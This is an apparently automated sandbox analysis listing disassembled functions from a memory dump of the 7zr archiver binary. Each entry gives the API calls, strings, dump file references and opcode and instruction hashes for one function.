                          • Opcode Fuzzy Hash: 36482d86404c6f28527af389d77e287806f36db2ff6b8b70d7a1b4323241917f
                          • Instruction Fuzzy Hash: 671211319046499FDF26EFA4C884BEEBBF6AF64314F14006DE44667292CB70AE45CB61
                          APIs
                          • __EH_prolog.LIBCMT ref: 001C4E8F
                            • Part of subcall function 0018965D: VariantClear.OLEAUT32(?), ref: 0018967F
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ClearH_prologVariantfree
                          • String ID: file
                          • API String ID: 904627215-2359244304
                          • Opcode ID: a56887283a1b55e049601f952063ace0af228878ec68383cbc95d9b90085e014
                          • Instruction ID: 1d8dc1efacfe3ac0ed5db73534826480368f72fb193ec01deff60de21f407961
                          • Opcode Fuzzy Hash: a56887283a1b55e049601f952063ace0af228878ec68383cbc95d9b90085e014
                          • Instruction Fuzzy Hash: 3B125A31900649EBCF16EFA4C995AEDBBB6BF64344F24406CE405AB252DB71AE46CF10
                          APIs
                          • __EH_prolog.LIBCMT ref: 001A2CE0
                            • Part of subcall function 00185E10: __EH_prolog.LIBCMT ref: 00185E15
                            • Part of subcall function 001941EC: _CxxThrowException.MSVCRT(?,00234A58), ref: 0019421A
                            • Part of subcall function 0018965D: VariantClear.OLEAUT32(?), ref: 0018967F
                          Strings
                          • Cannot create output directory, xrefs: 001A3070
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$ClearExceptionThrowVariant
                          • String ID: Cannot create output directory
                          • API String ID: 814188403-1181934277
                          • Opcode ID: 2b089894c262a7e42057309badd93efe9e54dae170d4daacecb586567735505e
                          • Instruction ID: ab03e4235df27a97b98589581350e6caea085fb014d0574f4b049bfa064e1f8d
                          • Opcode Fuzzy Hash: 2b089894c262a7e42057309badd93efe9e54dae170d4daacecb586567735505e
                          • Instruction Fuzzy Hash: A6F1B575904289EFCF25EFA8C990AEDBBB5BF2A300F1440ADF44567252DB309E45CB51
                          APIs
                          • fputs.MSVCRT ref: 001BC840
                            • Part of subcall function 001825CB: _CxxThrowException.MSVCRT(?,00234A58), ref: 001825ED
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ExceptionThrowfputs
                          • String ID:
                          • API String ID: 1334390793-399585960
                          • Opcode ID: 40e384ae9f320b07aab40d7630dc7c858fb1feedf0086b6db92ffe4ce3486561
                          • Instruction ID: 9331d909d4207d4b15051e703b95f28b047ddb78d7b0d28e0a374144c3153312
                          • Opcode Fuzzy Hash: 40e384ae9f320b07aab40d7630dc7c858fb1feedf0086b6db92ffe4ce3486561
                          • Instruction Fuzzy Hash: 51110171604740AFDB25CF58C8C1BAAFBE6EF49304F04446EE1868B240CBB1BD04CBA0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs
                          • String ID: Open
                          • API String ID: 1795875747-71445658
                          • Opcode ID: 3c94b8cc66ea9f610dfb4eee6d5a8025736869da263ec2914987521a7176628f
                          • Instruction ID: 528c053886ad5c9b3582782a20ffa89f58cbbdf6fa1588ca4a1f29a936a51b4b
                          • Opcode Fuzzy Hash: 3c94b8cc66ea9f610dfb4eee6d5a8025736869da263ec2914987521a7176628f
                          • Instruction Fuzzy Hash: 2A11A072101704EFC760EF74ED96ADABBA5EF64310F50853EE59A83212DB35A904CF50
                          APIs
                          • __EH_prolog.LIBCMT ref: 001958C3
                            • Part of subcall function 00186C72: __EH_prolog.LIBCMT ref: 00186C77
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$free
                          • String ID:
                          • API String ID: 2654054672-0
                          • Opcode ID: 55494db77bb1ad2cd9c3dc7664c6a6ba6b557f32c5a5a8cc64b418279932a56a
                          • Instruction ID: 332f6e47a01d728bd2ae38b43c6d0143b7f4982859edadbb513d200cbd6f13ef
                          • Opcode Fuzzy Hash: 55494db77bb1ad2cd9c3dc7664c6a6ba6b557f32c5a5a8cc64b418279932a56a
                          • Instruction Fuzzy Hash: D791E331900905AFDF27EBE4D881AEEBBB7EF64354F244068E942B7251DB315E45CBA0
                          APIs
                          • __EH_prolog.LIBCMT ref: 001D06B3
                          • _CxxThrowException.MSVCRT(?,0023D480), ref: 001D08F2
                            • Part of subcall function 00181E0C: malloc.MSVCRT ref: 00181E1F
                            • Part of subcall function 00181E0C: _CxxThrowException.MSVCRT(?,00234B28), ref: 00181E39
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ExceptionThrow$H_prologmalloc
                          • String ID:
                          • API String ID: 3044594480-0
                          • Opcode ID: 8403ddd8af256917fdb82dbe1d32d9f3f6de8f10c8a805e6d69d4f5ee9e16c38
                          • Instruction ID: 28225a504ab3dd1b6120c93fe18922b99762c4312329a022c2b2d70787feee94
                          • Opcode Fuzzy Hash: 8403ddd8af256917fdb82dbe1d32d9f3f6de8f10c8a805e6d69d4f5ee9e16c38
                          • Instruction Fuzzy Hash: 7C913A71D00249DFCB22DFA8C891BEEBBB5BF18304F14409AE449A7252C730AE45DF61
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 6f48ca98c9bfe6c011cf7d64b65487c15b6cecc2133537561ba3cf855fcebbd4
                          • Instruction ID: 8918cdf0f578a980fcb8ff89d5ef219e55a5063eb93aedfd9bfbcec5a590d878
                          • Opcode Fuzzy Hash: 6f48ca98c9bfe6c011cf7d64b65487c15b6cecc2133537561ba3cf855fcebbd4
                          • Instruction Fuzzy Hash: D4519F74518B80AFDF25DF64C490AEABBF1BF55300F18889DE4D64B282C730BA84DB50
                          APIs
                          • __EH_prolog.LIBCMT ref: 001A7B4D
                          • memcpy.MSVCRT(00000000,002427DC,00000000,00000000,?,?,00000000,00000000,00000000,00000002), ref: 001A7C65
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prologmemcpy
                          • String ID:
                          • API String ID: 2991061955-0
                          • Opcode ID: 66a53fbde091b9fb53f9738b39a94f92404e81aaae0c945528edaf4b82a26aac
                          • Instruction ID: e8895a66edca77058654db3a306940a027c582355861361adb0bead7c9ddac65
                          • Opcode Fuzzy Hash: 66a53fbde091b9fb53f9738b39a94f92404e81aaae0c945528edaf4b82a26aac
                          • Instruction Fuzzy Hash: 2041AC75904219DFCF21EFA4C991AEEB7F4BF29300F104429E456A3292DB30AF09CB60
                          APIs
                          • __EH_prolog.LIBCMT ref: 001D1516
                            • Part of subcall function 001D10D3: __EH_prolog.LIBCMT ref: 001D10D8
                          • _CxxThrowException.MSVCRT(?,0023D480), ref: 001D1561
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$ExceptionThrow
                          • String ID:
                          • API String ID: 2366012087-0
                          • Opcode ID: ba83966f72e87da5c3612279c876f41a53ebbbadd0daa0fbb65102a9f364af90
                          • Instruction ID: cff13240b47a8442cdfc906309b9e0908eeadf4c867b57a9261937e56fcbb72d
                          • Opcode Fuzzy Hash: ba83966f72e87da5c3612279c876f41a53ebbbadd0daa0fbb65102a9f364af90
                          • Instruction Fuzzy Hash: 4901F232514288BEDF118F94D815BEF7FB8EF96354F04405AF4055A211C3BAE9A18BA0
                          APIs
                          • __EH_prolog.LIBCMT ref: 001B5800
                          • fputs.MSVCRT ref: 001B5830
                            • Part of subcall function 00181FA0: fputc.MSVCRT ref: 00181FA7
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prologfputcfputsfree
                          • String ID:
                          • API String ID: 195749403-0
                          • Opcode ID: ddb337d2fe21d98e625d343030c0968bb61ab89fba9df1550f53fb2d27ef10f6
                          • Instruction ID: 68493812464b015a6acc808da00d993afea1491c33d1e13c2a6b807b900c2974
                          • Opcode Fuzzy Hash: ddb337d2fe21d98e625d343030c0968bb61ab89fba9df1550f53fb2d27ef10f6
                          • Instruction Fuzzy Hash: C9F0BE32904404EBCB16BB94E4027DEBBB1EF14310F10442AE801A20A1CB305A96CF84
                          APIs
                          • SysAllocStringLen.OLEAUT32(?,?), ref: 0018952C
                          • _CxxThrowException.MSVCRT(?,002355B8), ref: 0018954A
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: AllocExceptionStringThrow
                          • String ID:
                          • API String ID: 3773818493-0
                          • Opcode ID: 1cc6b2bd4dc7eec57671692a72e3ecf5dc7108c7fc23ffd684197789d01164a3
                          • Instruction ID: b556b16b84b399125761069b9322f9a67817eae47f7f76fc9290868973d2c737
                          • Opcode Fuzzy Hash: 1cc6b2bd4dc7eec57671692a72e3ecf5dc7108c7fc23ffd684197789d01164a3
                          • Instruction Fuzzy Hash: C8F065B1210304AFC710EF94D849D9B77ECEF05340740842AF908CB210E770E9508BD0
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs$fputc
                          • String ID:
                          • API String ID: 1185151155-0
                          • Opcode ID: b506a98d69a434adf28691fc9190b29612f205dca51439183f4888b4306f87c9
                          • Instruction ID: b1e6cc34081c6a0380addbfba0eb780bcafd29fedc45af57bed48c6aa0f94efd
                          • Opcode Fuzzy Hash: b506a98d69a434adf28691fc9190b29612f205dca51439183f4888b4306f87c9
                          • Instruction Fuzzy Hash: 1BE0C2372091106FD6262B48FC8689837D9DFC9361335002FE740D3264AF933E1A5BB4
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ErrorLast_beginthreadex
                          • String ID:
                          • API String ID: 4034172046-0
                          • Opcode ID: dca20e0d9bc90f4d8de07838ff60432669bddae8d329cdbf0ce2b5598f77eaa5
                          • Instruction ID: 1fa3307a330e09a8331308d33231318a075e157e6126b1781a38f9662208eb94
                          • Opcode Fuzzy Hash: dca20e0d9bc90f4d8de07838ff60432669bddae8d329cdbf0ce2b5598f77eaa5
                          • Instruction Fuzzy Hash: F1E08CB22582026AE3109F609C06FA772E8ABB0B40F50846DBA45C6180E6A0CD50C7A1
                          APIs
                          • GetCurrentProcess.KERNEL32(?,?,00189C6E), ref: 00189C52
                          • GetProcessAffinityMask.KERNEL32(00000000), ref: 00189C59
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: Process$AffinityCurrentMask
                          • String ID:
                          • API String ID: 1231390398-0
                          • Opcode ID: 3eafd22ce9e4197b98c4c76c3cd55712b522e6346ad9dc3c5b74dbfe274786c3
                          • Instruction ID: a5b4cd6d8207f8594f11249372fde07b2cc261940b52dbb1601c1fb595284121
                          • Opcode Fuzzy Hash: 3eafd22ce9e4197b98c4c76c3cd55712b522e6346ad9dc3c5b74dbfe274786c3
                          • Instruction Fuzzy Hash: 0CB092B2400100FBCE209BE0ED0CC1A3B2CEE042013205644B109C2010C636C24A8B68
                          APIs
                          • memcpy.MSVCRT(?,00000000,00000000,00000000,00040000,?), ref: 0018B843
                          • GetLastError.KERNEL32 ref: 0018B8AA
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ErrorLastmemcpy
                          • String ID:
                          • API String ID: 2523627151-0
                          • Opcode ID: b2593ca198c6908aa3992239e512f48ac00b15060215d4f83911a10910fc887a
                          • Instruction ID: 5d7af44f38afda1ad6529c3f9c7bf53506ab791c0520fcb2f054dd5208be4ec0
                          • Opcode Fuzzy Hash: b2593ca198c6908aa3992239e512f48ac00b15060215d4f83911a10910fc887a
                          • Instruction Fuzzy Hash: 16815A71A047059FDB74EE25C9C0AAAB7F6BF85314F244A2EE84687A50E734FA41CF50
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ExceptionThrowmalloc
                          • String ID:
                          • API String ID: 2436765578-0
                          • Opcode ID: 8da7eeabca264a52892d84f2892dd620f8a0bd8b75dd61f4708557b1dba959e9
                          • Instruction ID: e1da03fcace62717eb20fd74594db4d93acbb42140ff3040a82c1f20b559c9a0
                          • Opcode Fuzzy Hash: 8da7eeabca264a52892d84f2892dd620f8a0bd8b75dd61f4708557b1dba959e9
                          • Instruction Fuzzy Hash: C3E08C3101424CBACF116FA0D804BD93BAC5B01359F00A015FC1C8E101C770C7E28B44
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 4b04b9f73c297e1911d5891a422eb1e9b4a870479aacb2766e05bc830287747b
                          • Instruction ID: 64295892b0eabfc121d823f3db7dacaeec417f100870acb40146fbc843a499bd
                          • Opcode Fuzzy Hash: 4b04b9f73c297e1911d5891a422eb1e9b4a870479aacb2766e05bc830287747b
                          • Instruction Fuzzy Hash: 07528B30908249DFDF05CFA8C595BAEBBB5AF69304F28409DE805EB281CB75DE41CB21
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: e1002948f4a63f34642ba5588282bca9c4420237dbdbc47801bcf4af178cf2fe
                          • Instruction ID: 344c0ac8976bd332f6728fa18b737c1420ce6c833a59c17c9602c918dd9d6602
                          • Opcode Fuzzy Hash: e1002948f4a63f34642ba5588282bca9c4420237dbdbc47801bcf4af178cf2fe
                          • Instruction Fuzzy Hash: A4F1ED70A04785DFDF25CFA4C490AAABBF1BF29304F58486EE49A9B211D730BD44CB21
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 3bebf4e04fc2146a02a3adcd49315a74f27234f3ac109eeb3cb9b46b4ef36cae
                          • Instruction ID: b6715f7cebe3095bdac6b2c3433687d6b3d05c2de19578f563ff2012a5976582
                          • Opcode Fuzzy Hash: 3bebf4e04fc2146a02a3adcd49315a74f27234f3ac109eeb3cb9b46b4ef36cae
                          • Instruction Fuzzy Hash: C2D15770A04645BFDF29CFA8C880BEEBBB2BF58314F20452EE455A6751D775A884CB90
                          APIs
                          • __EH_prolog.LIBCMT ref: 001CCF96
                            • Part of subcall function 001D1511: __EH_prolog.LIBCMT ref: 001D1516
                            • Part of subcall function 001D1511: _CxxThrowException.MSVCRT(?,0023D480), ref: 001D1561
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$ExceptionThrow
                          • String ID:
                          • API String ID: 2366012087-0
                          • Opcode ID: d4d545001ac5330edbd5d245fae36724400cd037b52a8f43847978b1392b3c4c
                          • Instruction ID: 7c0587f9c92c37e7083afdd2b9af220bd49fd0fccd604cc0ba79e926b3f3a6b4
                          • Opcode Fuzzy Hash: d4d545001ac5330edbd5d245fae36724400cd037b52a8f43847978b1392b3c4c
                          • Instruction Fuzzy Hash: E6514B70900289DFCB11CFA8D888FAEBBB4AF59304F1444AEF45A97242C775DE55CB21
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 682ef26566163b49fffcd782302061fdb808d346b0852b891817e98bc4951211
                          • Instruction ID: af920b9e8b00dc61617ec0a92d2c6b4470f1c38a701e9d740d35ad5bdba74667
                          • Opcode Fuzzy Hash: 682ef26566163b49fffcd782302061fdb808d346b0852b891817e98bc4951211
                          • Instruction Fuzzy Hash: 63516874A00606DFCB14CFA4C8909BAFBB2FF89304B10896DE592AB751D731A916CF90
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
